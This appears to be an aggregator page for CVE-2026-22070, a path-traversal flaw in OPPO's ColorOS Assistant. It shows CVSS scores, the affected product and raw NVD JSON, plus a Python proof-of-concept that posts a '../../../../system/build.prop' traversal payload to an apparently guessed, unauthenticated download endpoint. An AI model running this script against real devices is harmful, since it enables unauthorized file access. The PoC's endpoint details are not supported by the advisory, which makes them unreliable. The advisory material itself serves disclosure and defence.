Security Vulnerability Report
中文
CVE-2026-22070 CVSS 7.1 HIGH

CVE-2026-22070

Published: 2026-04-30 09:16:03
Last Modified: 2026-05-05 02:53:05

Description

ColorOS Assistant has an unauthenticated start-download channel, leading to file path traversal.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:oppo:coloros_assistant:1.4.26:*:*:*:*:*:*:* - VULNERABLE
ColorOS Assistant (具体受影响版本未在公告中披露)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-22070 # Exploit: Unauthenticated start-download channel leading to path traversal import requests def exploit(target_ip): # The vulnerable endpoint for starting download url = f"http://{target_ip}/api/start-download" # Path traversal payload to access sensitive files # Example: trying to access /system/build.prop or similar payload = { "file_path": "../../../../system/build.prop" } try: print(f"[*] Sending payload to {url}...") # Sending request without authentication (PR:N) response = requests.post(url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response for potential leakage.") print(response.text) else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target IP exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22070", "sourceIdentifier": "[email protected]", "published": "2026-04-30T09:16:02.917", "lastModified": "2026-05-05T02:53:05.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ColorOS Assistant has an unauthenticated start-download channel, leading to file path traversal."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-23"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oppo:coloros_assistant:1.4.26:*:*:*:*:*:*:*", "matchCriteriaId": "9C5FBAA3-4551-45F0-8616-C1C02F902625"}]}]}], "references": [{"url": "https://security.oppo.com/en/noticeDetail?notice_only_key=NOTICE-2049764240746881024", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}